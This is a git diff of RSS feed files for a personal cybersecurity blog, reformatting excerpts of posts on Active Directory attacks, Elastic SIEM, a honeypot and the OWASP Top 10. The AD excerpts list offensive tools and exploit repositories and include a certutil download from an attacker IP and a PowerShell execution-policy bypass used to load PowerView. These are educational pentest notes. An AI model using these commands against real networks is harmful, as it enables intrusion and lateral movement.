b/public/blog/index.xml @@ -4,91 +4,52 @@ Blogs on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/ Recent content in Blogs on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Hugo en-US Copyright © 2023, Atharva Auti. - Tue, 17 Oct 2023 12:35:53 +0530 + Tue, 17 Oct 2023 12:35:53 +0530 + Demystifying Elastic SIEM https://auti.dev/demystifying-elastic-siem/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/demystifying-elastic-siem/ Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers. - Useful AD Resources https://auti.dev/useful-ad-resources/ Fri, 20 Aug 2021 12:35:53 +0530 - https://auti.dev/useful-ad-resources/ - Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases -Mitm6: https://github.com/fox-it/mitm6 -Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView -Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 -Mimikatz: https://github.com/gentilkiwi/mimikatz -PRET: https://github.com/RUB-NDS/PRET -Praeda: https://github.com/percx/Praeda -SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) -LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) -cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 -calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 -Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa -Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ -mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ -Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ -Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet -A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ -Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html -GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ + Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases Mitm6: https://github.com/fox-it/mitm6 Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 Mimikatz: https://github.com/gentilkiwi/mimikatz PRET: https://github.com/RUB-NDS/PRET Praeda: https://github.com/percx/Praeda SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ - Compromising AD - Part 4: Post Exploitation https://auti.dev/compromising-ad-part-4-post-exploitation/ Tue, 17 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-4-post-exploitation/ - Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil -certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host -python -m SimpleHTTPServer [port] Browser -Navigate directly to the file (%20 for spaces) FTP -On Attacker Machine -python -m pyftpdlib 21 On Victim Machine, Browse to + Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host python -m SimpleHTTPServer [port] Browser Navigate directly to the file (%20 for spaces) FTP On Attacker Machine python -m pyftpdlib 21 On Victim Machine, Browse to - Compromising AD - Part 3: Post Compromise Attacks https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Mon, 16 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks! - Compromising AD - Part 2: Post Compromise Enumeration https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ Sun, 15 Aug 2021 12:37:53 +0530 - https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ - Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView -Enumeration Load up a command prompt and cd into Downloads -powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView -. .\Powerview.ps1 Fundamental Commands -Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). + Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Enumeration Load up a command prompt and cd into Downloads powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView . .\Powerview.ps1 Fundamental Commands Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). - Compromising AD - Part 1: Initial Attack Vectors https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ Sun, 15 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ - Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. -Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense. + Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense. - diff --git a/public/blog/owasp/index.xml b/public/blog/owasp/index.xml index bff08db..391458b 100644 --- a/public/blog/owasp/index.xml +++ b/public/blog/owasp/index.xml @@ -1,22 +1,20 @@ - owasp on auti.dev   ≽^._.^≼ ∫ + Owasp on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/owasp/ - Recent content in owasp on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Recent content in Owasp on auti.dev   ≽^._.^≼ ∫ + Hugo en-US Copyright © 2023, Atharva Auti. - Wed, 15 Feb 2023 12:22:44 +0530 + Wed, 15 Feb 2023 12:22:44 +0530 + OWASP Top 10 https://auti.dev/owasp-top-10/ Wed, 15 Feb 2023 12:22:44 +0530 - https://auti.dev/owasp-top-10/ - First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com -I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. + First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. - diff --git a/public/blog/purple-teaming/index.xml b/public/blog/purple-teaming/index.xml index f8238d2..217db30 100644 --- a/public/blog/purple-teaming/index.xml +++ b/public/blog/purple-teaming/index.xml @@ -1,22 +1,20 @@ - purple-teaming on auti.dev   ≽^._.^≼ ∫ + Purple-Teaming on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/purple-teaming/ - Recent content in purple-teaming on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Recent content in Purple-Teaming on auti.dev   ≽^._.^≼ ∫ + Hugo en-US Copyright © 2023, Atharva Auti. - Sat, 19 Aug 2023 14:28:54 +0530 + Sat, 19 Aug 2023 14:28:54 +0530 + HoneyTrack https://auti.dev/honeytrack/ Sat, 19 Aug 2023 14:28:54 +0530 - https://auti.dev/honeytrack/ - Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. -HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. + Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. - diff --git a/public/blog/red-teaming/index.xml b/public/blog/red-teaming/index.xml index 936a7ee..58dca48 100644 --- a/public/blog/red-teaming/index.xml +++ b/public/blog/red-teaming/index.xml @@ -1,95 +1,55 @@ - red-teaming on auti.dev   ≽^._.^≼ ∫ + Red-Teaming on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/red-teaming/ - Recent content in red-teaming on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Recent content in Red-Teaming on auti.dev   ≽^._.^≼ ∫ + Hugo en-US Copyright © 2023, Atharva Auti. - Wed, 15 Feb 2023 12:22:44 +0530 + Wed, 15 Feb 2023 12:22:44 +0530 + OWASP Top 10 https://auti.dev/owasp-top-10/ Wed, 15 Feb 2023 12:22:44 +0530 - https://auti.dev/owasp-top-10/ - First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com -I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. + First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. - Useful AD Resources https://auti.dev/useful-ad-resources/ Fri, 20 Aug 2021 12:35:53 +0530 - https://auti.dev/useful-ad-resources/ - Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases -Mitm6: https://github.com/fox-it/mitm6 -Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView -Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 -Mimikatz: https://github.com/gentilkiwi/mimikatz -PRET: https://github.com/RUB-NDS/PRET -Praeda: https://github.com/percx/Praeda -SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) -LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) -cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 -calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 -Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa -Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ -mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ -Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ -Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet -A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ -Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html -GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ + Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases Mitm6: https://github.com/fox-it/mitm6 Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 Mimikatz: https://github.com/gentilkiwi/mimikatz PRET: https://github.com/RUB-NDS/PRET Praeda: https://github.com/percx/Praeda SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ - Compromising AD - Part 4: Post Exploitation https://auti.dev/compromising-ad-part-4-post-exploitation/ Tue, 17 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-4-post-exploitation/ - Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil -certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host -python -m SimpleHTTPServer [port] Browser -Navigate directly to the file (%20 for spaces) FTP -On Attacker Machine -python -m pyftpdlib 21 On Victim Machine, Browse to + Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host python -m SimpleHTTPServer [port] Browser Navigate directly to the file (%20 for spaces) FTP On Attacker Machine python -m pyftpdlib 21 On Victim Machine, Browse to - Compromising AD - Part 3: Post Compromise Attacks https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Mon, 16 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks! - Compromising AD - Part 2: Post Compromise Enumeration https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ Sun, 15 Aug 2021 12:37:53 +0530 - https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ - Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView -Enumeration Load up a command prompt and cd into Downloads -powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView -. .\Powerview.ps1 Fundamental Commands -Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). + Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Enumeration Load up a command prompt and cd into Downloads powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView . .\Powerview.ps1 Fundamental Commands Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). - Compromising AD - Part 1: Initial Attack Vectors https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ Sun, 15 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ - Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. -Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense. + Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense. - diff --git a/public/blog/siem-soc/index.xml b/public/blog/siem-soc/index.xml index 5317688..5e0c9fe 100644 --- a/public/blog/siem-soc/index.xml +++ b/public/blog/siem-soc/index.xml @@ -1,31 +1,27 @@ - siem-soc on auti.dev   ≽^._.^≼ ∫ + Siem-Soc on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/siem-soc/ - Recent content in siem-soc on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Recent content in Siem-Soc on auti.dev   ≽^._.^≼ ∫ + Hugo en-US Copyright © 2023, Atharva Auti. - Tue, 17 Oct 2023 12:35:53 +0530 + Tue, 17 Oct 2023 12:35:53 +0530 + Demystifying Elastic SIEM https://auti.dev/demystifying-elastic-siem/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/demystifying-elastic-siem/ Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers. - Leveraging Cybersecurity using ElasticSearch https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ - First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com -This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. + First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. - diff --git a/public/blog/tools/index.xml b/public/blog/tools/index.xml index 8a2a5f0..07c2510 100644 --- a/public/blog/tools/index.xml +++ b/public/blog/tools/index.xml @@ -1,41 +1,34 @@ - tools on auti.dev   ≽^._.^≼ ∫ + Tools on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/tools/ - Recent content in tools on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Recent content in Tools on auti.dev   ≽^._.^≼ ∫ + Hugo en-US Copyright © 2023, Atharva Auti. - Tue, 17 Oct 2023 12:35:53 +0530 + Tue, 17 Oct 2023 12:35:53 +0530 + Demystifying Elastic SIEM https://auti.dev/demystifying-elastic-siem/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/demystifying-elastic-siem/ Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers. - Leveraging Cybersecurity using ElasticSearch https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ - First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com -This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. + First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. - HoneyTrack https://auti.dev/honeytrack/ Sat, 19 Aug 2023 14:28:54 +0530 - https://auti.dev/honeytrack/ - Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. -HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. + Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. - diff --git a/public/blog/web-security/index.xml b/public/blog/web-security/index.xml index 5ce8377..91ee67d 100644 --- a/public/blog/web-security/index.xml +++ b/public/blog/web-security/index.xml @@ -1,22 +1,20 @@ - web-security on auti.dev   ≽^._.^≼ ∫ + Web-Security on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/web-security/ - Recent content in web-security on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Recent content in Web-Security on auti.dev   ≽^._.^≼ ∫ + Hugo en-US Copyright © 2023, Atharva Auti. - Wed, 15 Feb 2023 12:22:44 +0530 + Wed, 15 Feb 2023 12:22:44 +0530 + OWASP Top 10 https://auti.dev/owasp-top-10/ Wed, 15 Feb 2023 12:22:44 +0530 - https://auti.dev/owasp-top-10/ - First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com -I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. + First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. - diff --git a/public/blog/windows/index.xml b/public/blog/windows/index.xml index e1a6e2c..78f75cc 100644 --- a/public/blog/windows/index.xml +++ b/public/blog/windows/index.xml @@ -1,85 +1,48 @@ - windows on auti.dev   ≽^._.^≼ ∫ + Windows on auti.dev   ≽^._.^≼ ∫ https://auti.dev/blog/windows/ - Recent content in windows on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Recent content in Windows on auti.dev   ≽^._.^≼ ∫ + Hugo en-US Copyright © 2023, Atharva Auti. - Fri, 20 Aug 2021 12:35:53 +0530 + Fri, 20 Aug 2021 12:35:53 +0530 + Useful AD Resources https://auti.dev/useful-ad-resources/ Fri, 20 Aug 2021 12:35:53 +0530 - https://auti.dev/useful-ad-resources/ - Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases -Mitm6: https://github.com/fox-it/mitm6 -Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView -Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 -Mimikatz: https://github.com/gentilkiwi/mimikatz -PRET: https://github.com/RUB-NDS/PRET -Praeda: https://github.com/percx/Praeda -SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) -LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) -cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 -calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 -Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa -Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ -mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ -Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ -Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet -A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ -Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html -GPP cPassword Attack: 